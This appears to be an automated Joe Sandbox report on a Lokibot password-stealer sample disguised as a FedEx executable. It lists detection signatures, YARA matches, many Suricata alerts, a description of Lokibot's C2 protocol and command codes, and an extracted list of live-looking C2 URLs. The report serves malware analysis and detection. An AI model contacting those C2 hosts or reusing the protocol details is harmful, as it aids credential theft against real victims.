Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FedEx_776282383902.exe

Overview

General Information

Sample name:FedEx_776282383902.exe
Analysis ID:1446057
MD5:d8754ead54bc3ccd3bb50e726362aef9
SHA1:d5c8560b76bfbf841db72e06b311f1c0346b20a5
SHA256:25c3b63be2ea8b26be5050a732146c6f611dc335a96f80860dec608ece37bc4e
Tags:exeFedExLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • FedEx_776282383902.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\FedEx_776282383902.exe" MD5: D8754EAD54BC3CCD3BB50E726362AEF9)
    • FedEx_776282383902.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\FedEx_776282383902.exe" MD5: D8754EAD54BC3CCD3BB50E726362AEF9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.61.137.215/index.php/t?id=090"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 30 entries
          SourceRuleDescriptionAuthorStrings
          3.2.FedEx_776282383902.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            3.2.FedEx_776282383902.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              3.2.FedEx_776282383902.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                3.2.FedEx_776282383902.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                3.2.FedEx_776282383902.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 37 entries
                No Sigma rule has matched
                Timestamp:05/22/24-22:01:50.434635
                SID:2025381
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:00.654651
                SID:2024313
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:00.654651
                SID:2024318
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:20.207962
                SID:2021641
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:47.110312
                SID:2024318
                Source Port:49708
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:10.745956
                SID:2024318
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:14.011875
                SID:2025381
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:10.745956
                SID:2024313
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:15.260799
                SID:2025381
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:39.745782
                SID:2025381
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:32.900181
                SID:2024318
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:03.530501
                SID:2025381
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:42.997268
                SID:2021641
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:32.900181
                SID:2024313
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:00.355563
                SID:2025381
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:33.749822
                SID:2025381
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:11.339177
                SID:2021641
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:00.355563
                SID:2024313
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:39.745782
                SID:2024313
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:06.757643
                SID:2025381
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:39.745782
                SID:2024318
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:22.325206
                SID:2021641
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:03.530501
                SID:2024318
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:43.048990
                SID:2025381
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:00.355563
                SID:2024318
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:24.001326
                SID:2021641
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:56.560139
                SID:2024318
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:39.786935
                SID:2021641
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:03.962389
                SID:2025381
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:10.745956
                SID:2025381
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:36.928242
                SID:2021641
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:47.110312
                SID:2025381
                Source Port:49708
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:18.886669
                SID:2021641
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:56.560139
                SID:2024313
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:15.260799
                SID:2024318
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:25.799709
                SID:2024318
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:36.285874
                SID:2021641
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:46.431591
                SID:2025381
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:15.260799
                SID:2024313
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:30.532619
                SID:2025381
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:03.962389
                SID:2024318
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:25.799709
                SID:2024313
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:39.786935
                SID:2025381
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:50.434635
                SID:2024313
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:03.962389
                SID:2024313
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:17.236236
                SID:2021641
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:27.150658
                SID:2021641
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:03.530501
                SID:2024313
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:52.721787
                SID:2024313
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:43.048990
                SID:2021641
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:52.721787
                SID:2024318
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:39.996238
                SID:2025381
                Source Port:49704
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:57.173481
                SID:2021641
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:43.233365
                SID:2024317
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:53.733914
                SID:2025381
                Source Port:49710
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:11.339177
                SID:2024313
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:43.233365
                SID:2024312
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:49.622449
                SID:2021641
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:39.996238
                SID:2024312
                Source Port:49704
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:14.011875
                SID:2024318
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:39.996238
                SID:2024317
                Source Port:49704
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:32.900181
                SID:2025381
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:33.749822
                SID:2021641
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:11.339177
                SID:2024318
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:53.733914
                SID:2024313
                Source Port:49710
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:14.011875
                SID:2024313
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:06.757643
                SID:2021641
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:52.721787
                SID:2025381
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:53.733914
                SID:2024318
                Source Port:49710
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:46.431591
                SID:2024318
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:00.654651
                SID:2025381
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:50.434635
                SID:2024318
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:29.494079
                SID:2021641
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:07.384774
                SID:2021641
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:47.110312
                SID:2021641
                Source Port:49708
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:20.207962
                SID:2025381
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:30.532619
                SID:2024318
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:46.431591
                SID:2024313
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:30.532619
                SID:2024313
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:00.654651
                SID:2021641
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:36.928242
                SID:2024313
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:20.207962
                SID:2024313
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:20.207962
                SID:2024318
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:10.745956
                SID:2021641
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:24.001326
                SID:2025381
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:11.339177
                SID:2025381
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:42.997268
                SID:2024313
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:49.622449
                SID:2025381
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:32.900181
                SID:2021641
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:42.997268
                SID:2024318
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:22.325206
                SID:2025381
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:39.745782
                SID:2021641
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:42.997268
                SID:2025381
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:24.001326
                SID:2024318
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:00.355563
                SID:2021641
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:24.001326
                SID:2024313
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:43.233365
                SID:2025381
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:22.325206
                SID:2024313
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:03.530501
                SID:2021641
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:27.150658
                SID:2025381
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:22.325206
                SID:2024318
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:18.886669
                SID:2024313
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:25.799709
                SID:2025381
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:39.786935
                SID:2024313
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:18.886669
                SID:2024318
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:39.786935
                SID:2024318
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:56.560139
                SID:2021641
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:36.928242
                SID:2024318
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:56.560139
                SID:2025381
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:07.384774
                SID:2025381
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:36.285874
                SID:2024318
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:25.799709
                SID:2021641
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:15.260799
                SID:2021641
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:18.886669
                SID:2025381
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:03.962389
                SID:2021641
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:52.721787
                SID:2021641
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:29.494079
                SID:2025381
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:36.285874
                SID:2024313
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:50.434635
                SID:2021641
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:36.928242
                SID:2025381
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:17.236236
                SID:2024318
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:06.757643
                SID:2024318
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:27.150658
                SID:2024313
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:43.048990
                SID:2024318
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:57.173481
                SID:2024313
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:57.173481
                SID:2024318
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:43.048990
                SID:2024313
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:43.233365
                SID:2021641
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:27.150658
                SID:2024318
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:17.236236
                SID:2024313
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:49.622449
                SID:2024313
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:39.996238
                SID:2021641
                Source Port:49704
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:17.236236
                SID:2025381
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:14.011875
                SID:2021641
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:53.733914
                SID:2021641
                Source Port:49710
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:06.757643
                SID:2024313
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:33.749822
                SID:2024313
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:49.622449
                SID:2024318
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:57.173481
                SID:2025381
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:33.749822
                SID:2024318
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:07.384774
                SID:2024318
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:36.285874
                SID:2025381
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:29.494079
                SID:2024313
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:46.431591
                SID:2021641
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:01:47.110312
                SID:2024313
                Source Port:49708
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:07.384774
                SID:2024313
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:02:30.532619
                SID:2021641
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/22/24-22:03:29.494079
                SID:2024318
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

